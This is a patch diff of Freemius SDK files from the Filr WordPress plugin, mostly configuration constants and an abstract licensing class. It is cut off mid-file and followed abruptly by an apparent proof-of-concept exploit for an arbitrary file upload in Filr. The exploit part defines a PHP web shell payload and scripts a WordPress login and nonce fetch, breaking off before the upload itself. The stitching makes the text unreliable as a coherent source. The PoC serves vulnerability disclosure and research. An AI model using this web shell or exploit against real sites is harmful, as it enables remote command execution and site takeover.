+ WP_FS__REMOTE_ADDR === '::1' )
+ );
+ }
+ }
+
+ if ( ! defined( 'WP_FS__IS_LOCALHOST_FOR_SERVER' ) ) {
+ define( 'WP_FS__IS_LOCALHOST_FOR_SERVER', ( ! WP_FS__IS_HTTP_REQUEST ||
+ false !== strpos( $_SERVER['HTTP_HOST'], 'localhost' ) ) );
+ }
+
+ #endregion
+
+ if ( ! defined( 'WP_FS__IS_PRODUCTION_MODE' ) ) {
+ // By default, run with Freemius production servers.
+ define( 'WP_FS__IS_PRODUCTION_MODE', true );
+ }
+
+ if ( ! defined( 'WP_FS__ADDRESS' ) ) {
+ define( 'WP_FS__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? WP_FS__ADDRESS_PRODUCTION : WP_FS__ADDRESS_LOCALHOST ) );
+ }
+
+
+ #--------------------------------------------------------------------------------
+ #region API
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'WP_FS__API_ADDRESS_LOCALHOST' ) ) {
+ define( 'WP_FS__API_ADDRESS_LOCALHOST', 'http://api.freemius-local.com:8080' );
+ }
+ if ( ! defined( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST' ) ) {
+ define( 'WP_FS__API_SANDBOX_ADDRESS_LOCALHOST', 'http://sandbox-api.freemius:8080' );
+ }
+
+ // Set API address for local testing.
+ if ( ! WP_FS__IS_PRODUCTION_MODE ) {
+ if ( ! defined( 'FS_API__ADDRESS' ) ) {
+ define( 'FS_API__ADDRESS', WP_FS__API_ADDRESS_LOCALHOST );
+ }
+ if ( ! defined( 'FS_API__SANDBOX_ADDRESS' ) ) {
+ define( 'FS_API__SANDBOX_ADDRESS', WP_FS__API_SANDBOX_ADDRESS_LOCALHOST );
+ }
+ }
+
+ #endregion
+
+ #--------------------------------------------------------------------------------
+ #region Checkout
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'FS_CHECKOUT__ADDRESS_PRODUCTION' ) ) {
+ define( 'FS_CHECKOUT__ADDRESS_PRODUCTION', 'https://checkout.freemius.com' );
+ }
+
+ if ( ! defined( 'FS_CHECKOUT__ADDRESS_LOCALHOST' ) ) {
+ define( 'FS_CHECKOUT__ADDRESS_LOCALHOST', 'http://checkout.freemius-local.com:8080' );
+ }
+
+ if ( ! defined( 'FS_CHECKOUT__ADDRESS' ) ) {
+ define( 'FS_CHECKOUT__ADDRESS', ( WP_FS__IS_PRODUCTION_MODE ? FS_CHECKOUT__ADDRESS_PRODUCTION : FS_CHECKOUT__ADDRESS_LOCALHOST ) );
+ }
+
+ #endregion
+
+ define( 'WP_FS___OPTION_PREFIX', 'fs' . ( WP_FS__IS_PRODUCTION_MODE ? '' : '_dbg' ) . '_' );
+
+ if ( ! defined( 'WP_FS__ACCOUNTS_OPTION_NAME' ) ) {
+ define( 'WP_FS__ACCOUNTS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'accounts' );
+ }
+ if ( ! defined( 'WP_FS__API_CACHE_OPTION_NAME' ) ) {
+ define( 'WP_FS__API_CACHE_OPTION_NAME', WP_FS___OPTION_PREFIX . 'api_cache' );
+ }
+ if ( ! defined( 'WP_FS__GDPR_OPTION_NAME' ) ) {
+ define( 'WP_FS__GDPR_OPTION_NAME', WP_FS___OPTION_PREFIX . 'gdpr' );
+ }
+ define( 'WP_FS__OPTIONS_OPTION_NAME', WP_FS___OPTION_PREFIX . 'options' );
+
+ /**
+ * Module types
+ *
+ * @since 1.2.2
+ */
+ define( 'WP_FS__MODULE_TYPE_PLUGIN', 'plugin' );
+ define( 'WP_FS__MODULE_TYPE_THEME', 'theme' );
+
+ /**
+ * Billing Frequencies
+ */
+ define( 'WP_FS__PERIOD_ANNUALLY', 'annual' );
+ define( 'WP_FS__PERIOD_MONTHLY', 'monthly' );
+ define( 'WP_FS__PERIOD_LIFETIME', 'lifetime' );
+
+ /**
+ * Plans
+ */
+ define( 'WP_FS__PLAN_DEFAULT_PAID', false );
+ define( 'WP_FS__PLAN_FREE', 'free' );
+ define( 'WP_FS__PLAN_TRIAL', 'trial' );
+
+ /**
+ * Times in seconds
+ */
+ if ( ! defined( 'WP_FS__TIME_5_MIN_IN_SEC' ) ) {
+ define( 'WP_FS__TIME_5_MIN_IN_SEC', 300 );
+ }
+ if ( ! defined( 'WP_FS__TIME_10_MIN_IN_SEC' ) ) {
+ define( 'WP_FS__TIME_10_MIN_IN_SEC', 600 );
+ }
+// define( 'WP_FS__TIME_15_MIN_IN_SEC', 900 );
+ if ( ! defined( 'WP_FS__TIME_12_HOURS_IN_SEC' ) ) {
+ define( 'WP_FS__TIME_12_HOURS_IN_SEC', 43200 );
+ }
+ if ( ! defined( 'WP_FS__TIME_24_HOURS_IN_SEC' ) ) {
+ define( 'WP_FS__TIME_24_HOURS_IN_SEC', WP_FS__TIME_12_HOURS_IN_SEC * 2 );
+ }
+ if ( ! defined( 'WP_FS__TIME_WEEK_IN_SEC' ) ) {
+ define( 'WP_FS__TIME_WEEK_IN_SEC', 7 * WP_FS__TIME_24_HOURS_IN_SEC );
+ }
+
+ #--------------------------------------------------------------------------------
+ #region Debugging
+ #--------------------------------------------------------------------------------
+
+ if ( ! defined( 'WP_FS__DEBUG_SDK' ) ) {
+ $debug_mode = get_option( 'fs_debug_mode', null );
+
+ if ( $debug_mode === null ) {
+ $debug_mode = false;
+ add_option( 'fs_debug_mode', $debug_mode );
+ }
+
+ define( 'WP_FS__DEBUG_SDK', is_numeric( $debug_mode ) ? ( 0 < $debug_mode ) : WP_FS__DEV_MODE );
+ }
+
+ if ( ! defined( 'WP_FS__ECHO_DEBUG_SDK' ) ) {
+ define( 'WP_FS__ECHO_DEBUG_SDK', WP_FS__DEV_MODE && ! empty( $_GET['fs_dbg_echo'] ) );
+ }
+ if ( ! defined( 'WP_FS__LOG_DATETIME_FORMAT' ) ) {
+ define( 'WP_FS__LOG_DATETIME_FORMAT', 'Y-m-d H:i:s' );
+ }
+ if ( ! defined( 'FS_API__LOGGER_ON' ) ) {
+ define( 'FS_API__LOGGER_ON', WP_FS__DEBUG_SDK );
+ }
+
+ if ( WP_FS__ECHO_DEBUG_SDK ) {
+ error_reporting( E_ALL );
+ }
+
+ #endregion
+
+ if ( ! defined( 'WP_FS__SCRIPT_START_TIME' ) ) {
+ define( 'WP_FS__SCRIPT_START_TIME', time() );
+ }
+ if ( ! defined( 'WP_FS__DEFAULT_PRIORITY' ) ) {
+ define( 'WP_FS__DEFAULT_PRIORITY', 10 );
+ }
+ if ( ! defined( 'WP_FS__LOWEST_PRIORITY' ) ) {
+ define( 'WP_FS__LOWEST_PRIORITY', 999999999 );
+ }
+
+ #--------------------------------------------------------------------------------
+ #region Multisite Network
+ #--------------------------------------------------------------------------------
+
+ /**
+ * Do not use this define directly, it will have the wrong value
+ * during plugin uninstall/deletion when the inclusion of the plugin
+ * is triggered due to registration with register_uninstall_hook().
+ *
+ * Instead, use fs_is_network_admin().
+ *
+ * @author Vova Feldman (@svovaf)
+ */
+ if ( ! defined( 'WP_FS__IS_NETWORK_ADMIN' ) ) {
+ define( 'WP_FS__IS_NETWORK_ADMIN',
+ is_multisite() &&
+ ( is_network_admin() ||
+ ( ( defined( 'DOING_AJAX' ) && DOING_AJAX &&
+ ( isset( $_REQUEST['_fs_network_admin'] ) && 'true' === $_REQUEST['_fs_network_admin'] /*||
+ ( ! empty( $_REQUEST['action'] ) && 'delete-plugin' === $_REQUEST['action'] )*/ )
+ ) ||
+ // Plugin uninstall.
+ defined( 'WP_UNINSTALL_PLUGIN' ) )
+ )
+ );
+ }
+
+ /**
+ * Do not use this define directly, it will have the wrong value
+ * during plugin uninstall/deletion when the inclusion of the plugin
+ * is triggered due to registration with register_uninstall_hook().
+ *
+ * Instead, use fs_is_blog_admin().
+ *
+ * @author Vova Feldman (@svovaf)
+ */
+ if ( ! defined( 'WP_FS__IS_BLOG_ADMIN' ) ) {
+ define( 'WP_FS__IS_BLOG_ADMIN', is_blog_admin() || ( defined( 'DOING_AJAX' ) && DOING_AJAX && isset( $_REQUEST['_fs_blog_admin'] ) ) );
+ }
+
+ if ( ! defined( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED' ) ) {
+ // Set to true to show network level settings even if delegated to site admins.
+ define( 'WP_FS__SHOW_NETWORK_EVEN_WHEN_DELEGATED', false );
+ }
+
+ #endregion
+
+ if ( ! defined( 'WP_FS__DEMO_MODE' ) ) {
+ define( 'WP_FS__DEMO_MODE', false );
+ }
+ if ( ! defined( 'FS_SDK__SSLVERIFY' ) ) {
+ define( 'FS_SDK__SSLVERIFY', false );
+ }
--- a/filr-protection/inc/freemius/includes/class-freemius-abstract.php
+++ b/filr-protection/inc/freemius/includes/class-freemius-abstract.php
@@ -1,538 +1,538 @@
-<?php
- /**
- * @package Freemius
- * @copyright Copyright (c) 2015, Freemius, Inc.
- * @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
- * @since 1.0.7
- */
-
- if ( ! defined( 'ABSPATH' ) ) {
- exit;
- }
-
-
- /**
- * - Each instance of Freemius class represents a single plugin
- * install by a single user (the installer of the plugin).
- *
- * - Each website can only have one install of the same plugin.
- *
- * - Install entity is only created after a user connects his account with Freemius.
- *
- * Class Freemius_Abstract
- */
- abstract class Freemius_Abstract {
-
- #----------------------------------------------------------------------------------
- #region Identity
- #----------------------------------------------------------------------------------
-
- /**
- * Check if user has connected his account (opted-in).
- *
- * Note:
- * If the user opted-in and opted-out on a later stage,
- * this will still return true. If you want to check if the
- * user is currently opted-in, use:
- * `$fs->is_registered() && $fs->is_tracking_allowed()`
- *
- * @since 1.0.1
- *
- * @param bool $ignore_anonymous_state Since 2.5.1
- *
- * @return bool
- */
- abstract function is_registered( $ignore_anonymous_state = false );
-
- /**
- * Check if the user skipped connecting the account with Freemius.
- *
- * @since 1.0.7
- *
- * @return bool
- */
- abstract function is_anonymous();
-
- /**
- * Check if the user currently in activation mode.
- *
- * @since 1.0.7
- *
- * @return bool
- */
- abstract function is_activation_mode();
-
- #endregion
-
- #----------------------------------------------------------------------------------
- #region Module Type
- #----------------------------------------------------------------------------------
-
- /**
- * Checks if the plugin's type is "plugin". The other type is "theme".
- *
- * @author Leo Fajardo (@leorw)
- * @since 1.2.2
- *
- * @return bool
- */
- abstract function is_plugin();
-
- /**
- * Checks if the module type is "theme". The other type is "plugin".
- *
- * @author Leo Fajardo (@leorw)
- * @since 1.2.2
- *
- * @return bool
- */
- function is_theme() {
- return ( ! $this->is_plugin() );
- }
-
- #endregion
-
- #----------------------------------------------------------------------------------
- #region Permissions
- #----------------------------------------------------------------------------------
-
- /**
- * Check if plugin must be WordPress.org compliant.
- *
- * @since 1.0.7
- *
- * @return bool
- */
- abstract function is_org_repo_compliant();
-
- /**
- * Check if plugin is allowed to install executable files.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.5
- *
- * @return bool
- */
- function is_allowed_to_install() {
- return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
- }
-
- #endregion
-
- /**
- * Check if user in trial or in free plan (not paying).
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.4
- *
- * @return bool
- */
- function is_not_paying() {
- return ( $this->is_trial() || $this->is_free_plan() );
- }
-
- /**
- * Check if the user has an activated and valid paid license on current plugin's install.
- *
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function is_paying();
-
- /**
- * Check if the user is paying or in trial.
- *
- * @since 1.0.9
- *
- * @return bool
- */
- function is_paying_or_trial() {
- return ( $this->is_paying() || $this->is_trial() );
- }
-
- /**
- * Check if user in a trial or have feature enabled license.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.7
- *
- * @return bool
- */
- abstract function can_use_premium_code();
-
- #----------------------------------------------------------------------------------
- #region Premium Only
- #----------------------------------------------------------------------------------
-
- /**
- * All logic wrapped in methods with "__premium_only()" suffix will be only
- * included in the premium code.
- *
- * Example:
- * if ( freemius()->is__premium_only() ) {
- * ...
- * }
- */
-
- /**
- * Returns true when running premium plugin code.
- *
- * @since 1.0.9
- *
- * @return bool
- */
- function is__premium_only() {
- return $this->is_premium();
- }
-
- /**
- * Check if the user has an activated and valid paid license on current plugin's install.
- *
- * @since 1.0.9
- *
- * @return bool
- *
- */
- function is_paying__premium_only() {
- return ( $this->is__premium_only() && $this->is_paying() );
- }
-
- /**
- * All code wrapped in this statement will be only included in the premium code.
- *
- * @since 1.0.9
- *
- * @param string $plan Plan name.
- * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
- *
- * @return bool
- */
- function is_plan__premium_only( $plan, $exact = false ) {
- return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
- }
-
- /**
- * Check if plan matches active license' plan or active trial license' plan.
- *
- * All code wrapped in this statement will be only included in the premium code.
- *
- * @since 1.0.9
- *
- * @param string $plan Plan name.
- * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
- *
- * @return bool
- */
- function is_plan_or_trial__premium_only( $plan, $exact = false ) {
- return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
- }
-
- /**
- * Check if the user is paying or in trial.
- *
- * All code wrapped in this statement will be only included in the premium code.
- *
- * @since 1.0.9
- *
- * @return bool
- */
- function is_paying_or_trial__premium_only() {
- return $this->is_premium() && $this->is_paying_or_trial();
- }
-
- /**
- * Check if the user has an activated and valid paid license on current plugin's install.
- *
- * @since 1.0.4
- *
- * @return bool
- *
- * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
- * @using Alias to is_paying__premium_only()
- */
- function is_paying__fs__() {
- return $this->is_paying__premium_only();
- }
-
- /**
- * Check if user in a trial or have feature enabled license.
- *
- * All code wrapped in this statement will be only included in the premium code.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.9
- *
- * @return bool
- */
- function can_use_premium_code__premium_only() {
- return $this->is_premium() && $this->can_use_premium_code();
- }
-
- #endregion
-
- #----------------------------------------------------------------------------------
- #region Trial
- #----------------------------------------------------------------------------------
-
- /**
- * Check if the user in a trial.
- *
- * @since 1.0.3
- *
- * @return bool
- */
- abstract function is_trial();
-
- /**
- * Check if trial already utilized.
- *
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function is_trial_utilized();
-
- #endregion
-
- #----------------------------------------------------------------------------------
- #region Plans
- #----------------------------------------------------------------------------------
-
- /**
- * Check if the user is on the free plan of the product.
- *
- * @since 1.0.4
- *
- * @return bool
- */
- abstract function is_free_plan();
-
- /**
- * @since 1.0.2
- *
- * @param string $plan Plan name.
- * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
- *
- * @return bool
- */
- abstract function is_plan( $plan, $exact = false );
-
- /**
- * Check if plan based on trial. If not in trial mode, should return false.
- *
- * @since 1.0.9
- *
- * @param string $plan Plan name.
- * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
- *
- * @return bool
- */
- abstract function is_trial_plan( $plan, $exact = false );
-
- /**
- * Check if plan matches active license' plan or active trial license' plan.
- *
- * @since 1.0.9
- *
- * @param string $plan Plan name.
- * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
- *
- * @return bool
- */
- function is_plan_or_trial( $plan, $exact = false ) {
- return $this->is_plan( $plan, $exact ) ||
- $this->is_trial_plan( $plan, $exact );
- }
-
- /**
- * Check if plugin has any paid plans.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.7
- *
- * @return bool
- */
- abstract function has_paid_plan();
-
- /**
- * Check if plugin has any free plan, or is it premium only.
- *
- * Note: If no plans configured, assume plugin is free.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.7
- *
- * @return bool
- */
- abstract function has_free_plan();
-
- /**
- * Check if plugin is premium only (no free plans).
- *
- * NOTE: is__premium_only() is very different method, don't get confused.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.9
- *
- * @return bool
- */
- abstract function is_only_premium();
-
- /**
- * Check if module has a premium code version.
- *
- * Serviceware module might be freemium without any
- * premium code version, where the paid features
- * are all part of the service.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.2.1.6
- *
- * @return bool
- */
- abstract function has_premium_version();
-
- /**
- * Check if module has any release on Freemius,
- * or all plugin's code is on WordPress.org (Serviceware).
- *
- * @return bool
- */
- function has_release_on_freemius() {
- return ! $this->is_org_repo_compliant() ||
- $this->has_premium_version();
- }
-
- /**
- * Checks if it's a freemium plugin.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.9
- *
- * @return bool
- */
- function is_freemium() {
- return $this->has_paid_plan() &&
- $this->has_free_plan();
- }
-
- /**
- * Check if module has only one plan.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.2.1.7
- *
- * @return bool
- */
- abstract function is_single_plan();
-
- #endregion
-
- /**
- * Check if running payments in sandbox mode.
- *
- * @since 1.0.4
- *
- * @return bool
- */
- abstract function is_payments_sandbox();
-
- /**
- * Check if running test vs. live plugin.
- *
- * @since 1.0.5
- *
- * @return bool
- */
- abstract function is_live();
-
- /**
- * Check if running premium plugin code.
- *
- * @since 1.0.5
- *
- * @return bool
- */
- abstract function is_premium();
-
- /**
- * Get upgrade URL.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.2
- *
- * @param string $period Billing cycle.
- *
- * @return string
- */
- abstract function get_upgrade_url( $period = WP_FS__PERIOD_ANNUALLY );
-
- /**
- * Check if Freemius was first added in a plugin update.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.5
- *
- * @return bool
- */
- function is_plugin_update() {
- return ! $this->is_plugin_new_install();
- }
-
- /**
- * Check if Freemius was part of the plugin when the user installed it first.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.1.5
- *
- * @return bool
- */
- abstract function is_plugin_new_install();
-
- #----------------------------------------------------------------------------------
- #region Marketing
- #----------------------------------------------------------------------------------
-
- /**
- * Check if current user purchased any other plugins before.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function has_purchased_before();
-
- /**
- * Check if current user classified as an agency.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function is_agency();
-
- /**
- * Check if current user classified as a developer.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function is_developer();
-
- /**
- * Check if current user classified as a business.
- *
- * @author Vova Feldman (@svovaf)
- * @since 1.0.9
- *
- * @return bool
- */
- abstract function is_business();
-
- #endregion
+<?php
+ /**
+ * @package Freemius
+ * @copyright Copyright (c) 2015, Freemius, Inc.
+ * @license https://www.gnu.org/licenses/gpl-3.0.html GNU General Public License Version 3
+ * @since 1.0.7
+ */
+
+ if ( ! defined( 'ABSPATH' ) ) {
+ exit;
+ }
+
+
+ /**
+ * - Each instance of Freemius class represents a single plugin
+ * install by a single user (the installer of the plugin).
+ *
+ * - Each website can only have one install of the same plugin.
+ *
+ * - Install entity is only created after a user connects his account with Freemius.
+ *
+ * Class Freemius_Abstract
+ */
+ abstract class Freemius_Abstract {
+
+ #----------------------------------------------------------------------------------
+ #region Identity
+ #----------------------------------------------------------------------------------
+
+ /**
+ * Check if user has connected his account (opted-in).
+ *
+ * Note:
+ * If the user opted-in and opted-out on a later stage,
+ * this will still return true. If you want to check if the
+ * user is currently opted-in, use:
+ * `$fs->is_registered() && $fs->is_tracking_allowed()`
+ *
+ * @since 1.0.1
+ *
+ * @param bool $ignore_anonymous_state Since 2.5.1
+ *
+ * @return bool
+ */
+ abstract function is_registered( $ignore_anonymous_state = false );
+
+ /**
+ * Check if the user skipped connecting the account with Freemius.
+ *
+ * @since 1.0.7
+ *
+ * @return bool
+ */
+ abstract function is_anonymous();
+
+ /**
+ * Check if the user currently in activation mode.
+ *
+ * @since 1.0.7
+ *
+ * @return bool
+ */
+ abstract function is_activation_mode();
+
+ #endregion
+
+ #----------------------------------------------------------------------------------
+ #region Module Type
+ #----------------------------------------------------------------------------------
+
+ /**
+ * Checks if the plugin's type is "plugin". The other type is "theme".
+ *
+ * @author Leo Fajardo (@leorw)
+ * @since 1.2.2
+ *
+ * @return bool
+ */
+ abstract function is_plugin();
+
+ /**
+ * Checks if the module type is "theme". The other type is "plugin".
+ *
+ * @author Leo Fajardo (@leorw)
+ * @since 1.2.2
+ *
+ * @return bool
+ */
+ function is_theme() {
+ return ( ! $this->is_plugin() );
+ }
+
+ #endregion
+
+ #----------------------------------------------------------------------------------
+ #region Permissions
+ #----------------------------------------------------------------------------------
+
+ /**
+ * Check if plugin must be WordPress.org compliant.
+ *
+ * @since 1.0.7
+ *
+ * @return bool
+ */
+ abstract function is_org_repo_compliant();
+
+ /**
+ * Check if plugin is allowed to install executable files.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.0.5
+ *
+ * @return bool
+ */
+ function is_allowed_to_install() {
+ return ( $this->is_premium() || ! $this->is_org_repo_compliant() );
+ }
+
+ #endregion
+
+ /**
+ * Check if user in trial or in free plan (not paying).
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.0.4
+ *
+ * @return bool
+ */
+ function is_not_paying() {
+ return ( $this->is_trial() || $this->is_free_plan() );
+ }
+
+ /**
+ * Check if the user has an activated and valid paid license on current plugin's install.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ */
+ abstract function is_paying();
+
+ /**
+ * Check if the user is paying or in trial.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ */
+ function is_paying_or_trial() {
+ return ( $this->is_paying() || $this->is_trial() );
+ }
+
+ /**
+ * Check if user in a trial or have feature enabled license.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.1.7
+ *
+ * @return bool
+ */
+ abstract function can_use_premium_code();
+
+ #----------------------------------------------------------------------------------
+ #region Premium Only
+ #----------------------------------------------------------------------------------
+
+ /**
+ * All logic wrapped in methods with "__premium_only()" suffix will be only
+ * included in the premium code.
+ *
+ * Example:
+ * if ( freemius()->is__premium_only() ) {
+ * ...
+ * }
+ */
+
+ /**
+ * Returns true when running premium plugin code.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ */
+ function is__premium_only() {
+ return $this->is_premium();
+ }
+
+ /**
+ * Check if the user has an activated and valid paid license on current plugin's install.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ *
+ */
+ function is_paying__premium_only() {
+ return ( $this->is__premium_only() && $this->is_paying() );
+ }
+
+ /**
+ * All code wrapped in this statement will be only included in the premium code.
+ *
+ * @since 1.0.9
+ *
+ * @param string $plan Plan name.
+ * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
+ *
+ * @return bool
+ */
+ function is_plan__premium_only( $plan, $exact = false ) {
+ return ( $this->is_premium() && $this->is_plan( $plan, $exact ) );
+ }
+
+ /**
+ * Check if plan matches active license' plan or active trial license' plan.
+ *
+ * All code wrapped in this statement will be only included in the premium code.
+ *
+ * @since 1.0.9
+ *
+ * @param string $plan Plan name.
+ * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
+ *
+ * @return bool
+ */
+ function is_plan_or_trial__premium_only( $plan, $exact = false ) {
+ return ( $this->is_premium() && $this->is_plan_or_trial( $plan, $exact ) );
+ }
+
+ /**
+ * Check if the user is paying or in trial.
+ *
+ * All code wrapped in this statement will be only included in the premium code.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ */
+ function is_paying_or_trial__premium_only() {
+ return $this->is_premium() && $this->is_paying_or_trial();
+ }
+
+ /**
+ * Check if the user has an activated and valid paid license on current plugin's install.
+ *
+ * @since 1.0.4
+ *
+ * @return bool
+ *
+ * @deprecated Method name is confusing since it's not clear from the name the code will be removed.
+ * @using Alias to is_paying__premium_only()
+ */
+ function is_paying__fs__() {
+ return $this->is_paying__premium_only();
+ }
+
+ /**
+ * Check if user in a trial or have feature enabled license.
+ *
+ * All code wrapped in this statement will be only included in the premium code.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.1.9
+ *
+ * @return bool
+ */
+ function can_use_premium_code__premium_only() {
+ return $this->is_premium() && $this->can_use_premium_code();
+ }
+
+ #endregion
+
+ #----------------------------------------------------------------------------------
+ #region Trial
+ #----------------------------------------------------------------------------------
+
+ /**
+ * Check if the user in a trial.
+ *
+ * @since 1.0.3
+ *
+ * @return bool
+ */
+ abstract function is_trial();
+
+ /**
+ * Check if trial already utilized.
+ *
+ * @since 1.0.9
+ *
+ * @return bool
+ */
+ abstract function is_trial_utilized();
+
+ #endregion
+
+ #----------------------------------------------------------------------------------
+ #region Plans
+ #----------------------------------------------------------------------------------
+
+ /**
+ * Check if the user is on the free plan of the product.
+ *
+ * @since 1.0.4
+ *
+ * @return bool
+ */
+ abstract function is_free_plan();
+
+ /**
+ * @since 1.0.2
+ *
+ * @param string $plan Plan name.
+ * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
+ *
+ * @return bool
+ */
+ abstract function is_plan( $plan, $exact = false );
+
+ /**
+ * Check if plan based on trial. If not in trial mode, should return false.
+ *
+ * @since 1.0.9
+ *
+ * @param string $plan Plan name.
+ * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
+ *
+ * @return bool
+ */
+ abstract function is_trial_plan( $plan, $exact = false );
+
+ /**
+ * Check if plan matches active license' plan or active trial license' plan.
+ *
+ * @since 1.0.9
+ *
+ * @param string $plan Plan name.
+ * @param bool $exact If true, looks for exact plan. If false, also check "higher" plans.
+ *
+ * @return bool
+ */
+ function is_plan_or_trial( $plan, $exact = false ) {
+ return $this->is_plan( $plan, $exact ) ||
+ $this->is_trial_plan( $plan, $exact );
+ }
+
+ /**
+ * Check if plugin has any paid plans.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.0.7
+ *
+ * @return bool
+ */
+ abstract function has_paid_plan();
+
+ /**
+ * Check if plugin has any free plan, or is it premium only.
+ *
+ * Note: If no plans configured, assume plugin is free.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.0.7
+ *
+ * @return bool
+ */
+ abstract function has_free_plan();
+
+ /**
+ * Check if plugin is premium only (no free plans).
+ *
+ * NOTE: is__premium_only() is very different method, don't get confused.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.1.9
+ *
+ * @return bool
+ */
+ abstract function is_only_premium();
+
+ /**
+ * Check if module has a premium code version.
+ *
+ * Serviceware module might be freemium without any
+ * premium code version, where the paid features
+ * are all part of the service.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.2.1.6
+ *
+ * @return bool
+ */
+ abstract function has_premium_version();
+
+ /**
+ * Check if module has any release on Freemius,
+ * or all plugin's code is on WordPress.org (Serviceware).
+ *
+ * @return bool
+ */
+ function has_release_on_freemius() {
+ return ! $this->is_org_repo_compliant() ||
+ $this->has_premium_version();
+ }
+
+ /**
+ * Checks if it's a freemium plugin.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.1.9
+ *
+ * @return bool
+ */
+ function is_freemium() {
+ return $this->has_paid_plan() &&
+ $this->has_free_plan();
+ }
+
+ /**
+ * Check if module has only one plan.
+ *
+ * @author Vova Feldman (@svovaf)
+ * @since 1.2.1.7
+ *
+ * @return bool
+ */
+ abstract function is_single_plan();
+
+ #endregion
+
+ /**
+ * Check if running payments in sandbox mode.
+ *
+ * @since 1.0.4
+ *
+ * @return bool
+ */
+ abstract function is_payments_sandbox();
+
+ /**
+ * Check if running test vs. live plugin.
+ *
+ * @since 1.0.5
+ *
+ * @return bool
+ */
+ abstract function is_live();
+
+ Proof of Concept (PHP)
NOTICE :
This proof-of-concept is provided for educational and authorized security research purposes only.
You may not use this code against any system, application, or network without explicit prior authorization from the system owner.
Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.
This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.
By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-28133 - Filr – Secure document library <= 1.2.13 - Authenticated (Contributor+) Arbitrary File Uploads
<?php
$target_url = 'http://vulnerable-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';
$malicious_file = 'shell.php';
$file_content = '<?php system($_GET["cmd"]); ?>';
// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$admin_url = $target_url . '/wp-admin/';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
'log' => $username,
'pwd' => $password,
'wp-submit' => 'Log In',
'redirect_to' => $admin_url,
'testcookie' => 1
]));
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
// Step 2: Extract nonce from Filr upload form
$filr_page = $target_url . '/wp-admin/admin.php?page=filr';
curl_setopt($ch, CURLOPT_URL, $filr_page);
curl_setopt($ch, CURLOPT_POST, 0);
$response = curl_exec($ch);
